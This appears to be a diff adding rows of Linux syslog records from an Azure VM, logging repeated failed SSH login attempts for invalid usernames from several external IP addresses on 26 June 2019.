+6860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:57,UbuntuDevEnv,2019-06-26 17:09:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:57,UbuntuDevEnv,2019-06-26 17:09:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:59,UbuntuDevEnv,2019-06-26 17:09:58,auth,UbuntuDevEnv,info,Failed password for invalid user wang from 35.154.19.93 port 37080 ssh2,45742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,35.154.19.9,37080,,
+6863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:59,UbuntuDevEnv,2019-06-26 17:09:58,auth,UbuntuDevEnv,info,Disconnected from invalid user wang 35.154.19.93 port 37080 [preauth],45742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,35.154.19.9,37080,,
+6864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:59,UbuntuDevEnv,2019-06-26 17:09:58,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 37080:11: Normal Shutdown, Thank you for playing [preauth]",45742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37080,,
+6865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:02,UbuntuDevEnv,2019-06-26 17:10:01,auth,UbuntuDevEnv,info,Connection closed by 171.8.199.77 port 49946 [preauth],45745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,49946,,
+6866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:11,UbuntuDevEnv,2019-06-26 17:10:11,auth,UbuntuDevEnv,info,Invalid user elastic from 81.0.212.18 port 38759,45801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,81.0.212.1,38759,,
+6867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:11,UbuntuDevEnv,2019-06-26 17:10:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,45801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:11,UbuntuDevEnv,2019-06-26 17:10:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:13,UbuntuDevEnv,2019-06-26 17:10:13,auth,UbuntuDevEnv,info,Failed password for invalid user elastic from 81.0.212.18 port 38759 ssh2,45801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,81.0.212.1,38759,,
+6870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:13,UbuntuDevEnv,2019-06-26 17:10:13,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 38759:11: Bye Bye [preauth],45801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,38759,,
+6871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:13,UbuntuDevEnv,2019-06-26 17:10:13,auth,UbuntuDevEnv,info,Disconnected from invalid user elastic 81.0.212.18 port 38759 [preauth],45801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,81.0.212.1,38759,,
+6872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:14,UbuntuDevEnv,2019-06-26 17:10:13,auth,UbuntuDevEnv,info,Invalid user crack from 35.154.19.93 port 40358,45811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,crack,35.154.19.9,40358,,
+6873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:14,UbuntuDevEnv,2019-06-26 17:10:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:14,UbuntuDevEnv,2019-06-26 17:10:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:16,UbuntuDevEnv,2019-06-26 17:10:15,auth,UbuntuDevEnv,info,Failed password for invalid user crack from 35.154.19.93 port 40358 ssh2,45811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,crack,35.154.19.9,40358,,
+6876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:16,UbuntuDevEnv,2019-06-26 17:10:15,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 40358:11: Normal Shutdown, Thank you for playing [preauth]",45811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40358,,
+6877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:16,UbuntuDevEnv,2019-06-26 17:10:15,auth,UbuntuDevEnv,info,Disconnected from invalid user crack 35.154.19.93 port 40358 [preauth],45811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,crack,35.154.19.9,40358,,
+6878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:22,UbuntuDevEnv,2019-06-26 17:10:21,auth,UbuntuDevEnv,info,Invalid user ts from 35.154.19.93 port 43646,45833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,35.154.19.9,43646,,
+6879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:22,UbuntuDevEnv,2019-06-26 17:10:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:22,UbuntuDevEnv,2019-06-26 17:10:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:23,UbuntuDevEnv,2019-06-26 17:10:23,auth,UbuntuDevEnv,info,Failed password for invalid user ts from 35.154.19.93 port 43646 ssh2,45833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,35.154.19.9,43646,,
+6882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:24,UbuntuDevEnv,2019-06-26 17:10:23,auth,UbuntuDevEnv,info,Disconnected from invalid user ts 35.154.19.93 port 43646 [preauth],45833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,35.154.19.9,43646,,
+6883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:24,UbuntuDevEnv,2019-06-26 17:10:23,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 43646:11: Normal Shutdown, Thank you for playing [preauth]",45833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43646,,
+6884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:29,UbuntuDevEnv,2019-06-26 17:10:29,auth,UbuntuDevEnv,info,Invalid user ts3 from 35.154.19.93 port 46916,45871,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,35.154.19.9,46916,,
+6885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:29,UbuntuDevEnv,2019-06-26 17:10:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45871,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:29,UbuntuDevEnv,2019-06-26 17:10:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45871,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:31,UbuntuDevEnv,2019-06-26 17:10:31,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 35.154.19.93 port 46916 ssh2,45871,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,35.154.19.9,46916,,
+6888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:31,UbuntuDevEnv,2019-06-26 17:10:31,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 46916:11: Normal Shutdown, Thank you for playing [preauth]",45871,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,46916,,
+6889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:31,UbuntuDevEnv,2019-06-26 17:10:31,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 35.154.19.93 port 46916 [preauth],45871,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,35.154.19.9,46916,,
+6890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:35,UbuntuDevEnv,2019-06-26 17:10:35,auth,UbuntuDevEnv,info,Invalid user grid from 35.154.19.93 port 50178,45890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,grid,35.154.19.9,50178,,
+6891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:35,UbuntuDevEnv,2019-06-26 17:10:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:35,UbuntuDevEnv,2019-06-26 17:10:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:37,UbuntuDevEnv,2019-06-26 17:10:36,auth,UbuntuDevEnv,info,Failed password for invalid user grid from 35.154.19.93 port 50178 ssh2,45890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,grid,35.154.19.9,50178,,
+6894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:37,UbuntuDevEnv,2019-06-26 17:10:37,auth,UbuntuDevEnv,info,Disconnected from invalid user grid 35.154.19.93 port 50178 [preauth],45890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,grid,35.154.19.9,50178,,
+6895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:37,UbuntuDevEnv,2019-06-26 17:10:37,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 50178:11: Normal Shutdown, Thank you for playing [preauth]",45890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50178,,
+6896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:43,UbuntuDevEnv,2019-06-26 17:10:43,auth,UbuntuDevEnv,info,Invalid user ssh from 35.154.19.93 port 53438,45916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ssh,35.154.19.9,53438,,
+6897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:43,UbuntuDevEnv,2019-06-26 17:10:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:43,UbuntuDevEnv,2019-06-26 17:10:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:45,UbuntuDevEnv,2019-06-26 17:10:44,auth,UbuntuDevEnv,info,Failed password for invalid user ssh from 35.154.19.93 port 53438 ssh2,45916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ssh,35.154.19.9,53438,,
+6900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:45,UbuntuDevEnv,2019-06-26 17:10:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 53438:11: Normal Shutdown, Thank you for playing [preauth]",45916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,53438,,
+6901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:45,UbuntuDevEnv,2019-06-26 17:10:45,auth,UbuntuDevEnv,info,Disconnected from invalid user ssh 35.154.19.93 port 53438 [preauth],45916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ssh,35.154.19.9,53438,,
+6902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:56,UbuntuDevEnv,2019-06-26 17:10:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:56,UbuntuDevEnv,2019-06-26 17:10:56,auth,UbuntuDevEnv,info,Invalid user deploy from 80.108.220.67 port 41338,45946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,80.108.220.6,41338,,
+6904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:56,UbuntuDevEnv,2019-06-26 17:10:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,45946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+6905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:59,UbuntuDevEnv,2019-06-26 17:10:58,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 80.108.220.67 port 41338 ssh2,45946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,80.108.220.6,41338,,
+6906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:59,UbuntuDevEnv,2019-06-26 17:10:58,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 80.108.220.67 port 41338 [preauth],45946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,80.108.220.6,41338,,
+6907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:10:59,UbuntuDevEnv,2019-06-26 17:10:58,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 41338:11: Bye Bye [preauth],45946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,41338,,
+6908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:08,UbuntuDevEnv,2019-06-26 17:11:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=sshd,46009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshd,35.154.19.9,,0,
+6909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:10,UbuntuDevEnv,2019-06-26 17:11:10,auth,UbuntuDevEnv,info,Failed password for sshd from 35.154.19.93 port 56746 ssh2,46009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56746,,
+6910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:11,UbuntuDevEnv,2019-06-26 17:11:10,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 56746:11: Normal Shutdown, Thank you for playing [preauth]",46009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56746,,
+6911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:11,UbuntuDevEnv,2019-06-26 17:11:10,auth,UbuntuDevEnv,info,Disconnected from authenticating user sshd 35.154.19.93 port 56746 [preauth],46009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,sshd,35.154.19.9,56746,,
+6912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:12,UbuntuDevEnv,2019-06-26 17:11:11,auth,UbuntuDevEnv,info,Invalid user factorio from 157.230.190.1 port 44162,46029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,157.230.190.1,44162,,
+6913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:12,UbuntuDevEnv,2019-06-26 17:11:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,46029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+6914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:12,UbuntuDevEnv,2019-06-26 17:11:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:14,UbuntuDevEnv,2019-06-26 17:11:14,auth,UbuntuDevEnv,info,Failed password for invalid user factorio from 157.230.190.1 port 44162 ssh2,46029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,157.230.190.1,44162,,
+6916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:14,UbuntuDevEnv,2019-06-26 17:11:14,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 44162:11: Bye Bye [preauth],46029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,44162,,
+6917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:14,UbuntuDevEnv,2019-06-26 17:11:14,auth,UbuntuDevEnv,info,Disconnected from invalid user factorio 157.230.190.1 port 44162 [preauth],46029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,157.230.190.1,44162,,
+6918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:17,UbuntuDevEnv,2019-06-26 17:11:17,auth,UbuntuDevEnv,info,Invalid user 2 from 77.237.69.165 port 53436,46045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,77.237.69.1,53436,,
+6919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:17,UbuntuDevEnv,2019-06-26 17:11:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
